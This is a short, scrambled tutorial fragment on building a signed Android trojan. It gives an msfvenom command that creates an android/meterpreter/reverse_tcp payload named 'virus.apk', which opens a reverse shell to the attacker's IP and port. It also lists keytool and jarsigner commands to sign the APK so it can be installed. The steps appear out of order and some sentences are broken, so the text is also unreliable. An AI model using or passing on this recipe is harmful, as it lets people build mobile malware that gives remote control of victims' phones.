
The keytool command is a key and certificate management utility. With MSFvenom we set the payload, the host which is our IP, the port and the output as “ virus.apk”. A quick explanation about the commands used createThePayload.sh and hit enter to execute the script, check the output in the terminal to see if everything is correct. Jarsigner -verify -verbose -certs virus.apk

Jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore virus.apk hacked Keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000 sudo apt-get install default-jdk -y

#!/bin/sh msfvenom -p android/meterpreter/reverse_tcp LHOST =YOURIP LPORT =YOURPORT -o virus.apk
